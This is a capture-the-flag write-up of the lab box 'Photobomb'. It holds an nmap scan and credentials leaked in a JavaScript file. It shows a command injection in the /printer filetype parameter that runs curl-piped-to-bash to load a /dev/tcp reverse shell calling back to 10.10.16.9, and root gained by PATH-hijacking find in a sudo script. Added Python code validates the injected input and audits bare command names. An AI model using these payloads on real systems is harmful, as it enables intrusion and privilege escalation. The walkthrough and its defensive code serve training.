Enumeration

Port Scan

# Nmap 7.92 scan initiated Sun Oct 16 22:14:47 2022 as: nmap -sC -sV -sS -vvv -oN nmap.txt photobomb.htb
Nmap scan report for photobomb.htb (10.129.228.60)
Host is up, received echo-reply ttl 63 (0.20s latency).
Scanned at 2022-10-16 22:14:48 IST for 50s
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
|   256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBrVE9flXamwUY+wiBc9IhaQJRE40YpDsbOGPxLWCKKjNAnSBYA9CPsdgZhoV8rtORq/4n+SO0T80x1wW3g19Ew=
|   256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEp8nHKD5peyVy3X3MsJCmH/HIUvJT+MONekDg5xYZ6D
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Photobomb
|_http-favicon: Unknown favicon MD5: 622B9ED3F0195B2D1811DF6F278518C2
| http-methods:
|_  Supported Methods: GET HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Oct 16 22:15:38 2022 -- 1 IP address (1 host up) scanned in 50.88 seconds

Website Enumeration


<!DOCTYPE html>
<html>
<head>
  <title>Photobomb</title>
  <link type="text/css" rel="stylesheet" href="styles.css" media="all" />
  <script src="photobomb.js"></script>
</head>
<body>
  <div id="container">
    <header>
      <h1><a href="/">Photobomb</a></h1>
    </header>
    <article>
      <h2>Welcome to your new Photobomb franchise!</h2>
      <p>You will soon be making an amazing income selling premium photographic gifts.</p>
      <p>This state of-the-art web application is your gateway to this fantastic new life. Your wish is its command.</p>
      <p>To get started, please <a href="/printer" class="creds">click here!</a> (the credentials are in your welcome pack).</p>
      <p>If you have any problems with your printer, please call our Technical Support team on 4 4283 77468377.</p>
    </article>
  </div>
</body>
</html>

The home page includes a script, photobomb.js, and links to an endpoint, /printer, that is protected by credentials from a "welcome pack". The script is worth reading:

function init() {
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
  if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
    document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer');
  }
}
window.onload = init;

We now have the credentials for the HTTP basic auth on /printer: pH0t0:b0Mb!


The printer page has a feature to download images in a chosen file type and size. Let's explore the request in Burp Suite.

Foothold

Request captured in Burp Suite: the same POST /printer request as below, with a ping to 10.10.16.9 injected after the filetype parameter.

Along with tcpdump (sudo tcpdump -i tun0) I am able to confirm that I'm able to ping myself from that remote host.

Let's use the following reverse shell payload generated using revshell.com. It is served as shell.sh from our host, and the injected command fetches it with curl and pipes it to bash:

/bin/bash -i >& /dev/tcp/10.10.16.9/4444 0>&1

POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: close
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1

photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg;curl+http%3a//10.10.16.9/shell.sh+|+bash;&dimensions=3000x2000

This request gives us a shell as the web application user.
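As an added example (not code from the write-up or from the box), this is the server-side fix for the injection above: every /printer parameter is checked against a strict allowlist before any command is built, so the request body shown above is rejected, and the accepted case becomes an argv list rather than a shell string. The converter binary name and the 10000-pixel limit are assumptions of this example.

```python
import re
from urllib.parse import parse_qs

# Request body from the write-up above (the injected one) and a constructed benign one
INJECTED_BODY = ("photo=voicu-apostol-MWER49YaD-M-unsplash.jpg"
                 "&filetype=jpg;curl+http%3a//10.10.16.9/shell.sh+|+bash;&dimensions=3000x2000")
BENIGN_BODY = "photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg&dimensions=3000x2000"

# Allowlists: a bare file name, a fixed set of formats, and WIDTHxHEIGHT digits only
PHOTO_RE = re.compile(r"[A-Za-z0-9_-]+\.(?:jpg|png)")
FILETYPES = {"jpg", "png"}
DIMENSIONS_RE = re.compile(r"(\d{1,5})x(\d{1,5})")
EXPECTED_KEYS = {"photo", "filetype", "dimensions"}

def validate_printer_body(body):
    """Parse a form-urlencoded /printer body; return (ok, reason, params).
    Anything not on an allowlist is rejected, so a shell metacharacter
    such as ';' in filetype never reaches a command line."""
    # separator="&" makes the split explicit: older parse_qs versions also
    # split on ';', which silently changes which key the payload lands in
    fields = parse_qs(body, keep_blank_values=True, separator="&")
    if set(fields) != EXPECTED_KEYS:
        return False, "unexpected or missing parameter", None
    if any(len(v) != 1 for v in fields.values()):
        return False, "repeated parameter", None
    photo, filetype, dims = (fields[k][0] for k in ("photo", "filetype", "dimensions"))
    if not PHOTO_RE.fullmatch(photo):
        return False, "photo: unexpected characters", None
    if filetype not in FILETYPES:
        return False, "filetype: not in allowlist", None
    m = DIMENSIONS_RE.fullmatch(dims)
    if not m:
        return False, "dimensions: not WIDTHxHEIGHT", None
    width, height = int(m[1]), int(m[2])
    if not (1 <= width <= 10000 and 1 <= height <= 10000):
        return False, "dimensions: out of range", None
    return True, "ok", {"photo": photo, "filetype": filetype,
                        "width": width, "height": height}

def build_convert_argv(params):
    """Argv list for the converter (the binary name is an assumption of this
    example): no shell parses it, so metacharacters cannot chain commands."""
    return ["/usr/bin/convert", "source_images/" + params["photo"], "-resize",
            f"{params['width']}x{params['height']}", f"{params['filetype']}:-"]

if __name__ == "__main__":
    for body in (INJECTED_BODY, BENIGN_BODY):
        print(validate_printer_body(body)[:2])
```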

Local Privilege Escalation


This is the content of /opt/cleanup.sh, which we are allowed to run with sudo:

#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

We see that find is called by its bare name, without an absolute path (unlike cat and truncate). Since we can run the script with sudo and set PATH, we can obtain privilege escalation with PATH hijacking.

cd /tmp
touch find
echo "/bin/bash -p" > find
chmod +x find
sudo PATH=/tmp:$PATH /opt/cleanup.sh
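As an added example (not code from the write-up or the box), a small Python auditor that walks a shell script and reports every command resolved through PATH instead of by absolute path, the check that would have caught cleanup.sh before it was granted via sudo. Run over the script above it flags find, and also chown: find's -exec resolves its command through PATH too, so hardening means absolute paths for both (or a fixed PATH at the top of the script). The keyword and builtin lists are a minimal assumption of this example.

```python
import shlex

# Script from the write-up (cleanup.sh), embedded here as test input
CLEANUP_SH = """\
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \\;
"""
# Words that never cause a PATH lookup (minimal list, an assumption of this example)
KEYWORDS = {"if", "then", "else", "elif", "fi", "do", "done", "while", "until",
            "for", "in", "!", "{", "}", "case", "esac"}
BUILTINS = {".", "source", "cd", "[", "[[", "]]", "test", "export", "exit",
            "return", "echo", "set", "unset", "shift", "read", "true", "false"}
SEPARATORS = {"&&", "||", "|", ";", "&"}
# After these words the next word is itself a command, resolved through PATH
WRAPPERS = {"sudo", "env", "nohup", "time", "xargs", "-exec", "-execdir", "-ok"}

def bare_commands(script):
    """Return (line_no, word) for every command executed by bare name,
    i.e. one that whoever controls PATH could replace."""
    hits = []
    for no, raw in enumerate(script.splitlines(), 1):
        try:
            words = shlex.split(raw, comments=True)  # drops comments, unquotes, turns \; into ;
        except ValueError:
            continue  # unbalanced quotes on this line: report nothing rather than guess
        expect_cmd = True  # the first word of a line is a command
        for w in words:
            if w in SEPARATORS or w in KEYWORDS:
                expect_cmd = True
                continue
            if expect_cmd:
                if "=" in w and not w.startswith("="):
                    continue  # VAR=value prefix: the command follows it
                expect_cmd = False
                if w not in BUILTINS and not w.startswith("/"):
                    hits.append((no, w))
            if w in WRAPPERS:
                expect_cmd = True
    return hits
```

bare_commands(CLEANUP_SH) returns [(13, 'find'), (13, 'chown')]; the same script with /usr/bin/find and /usr/bin/chown returns an empty list.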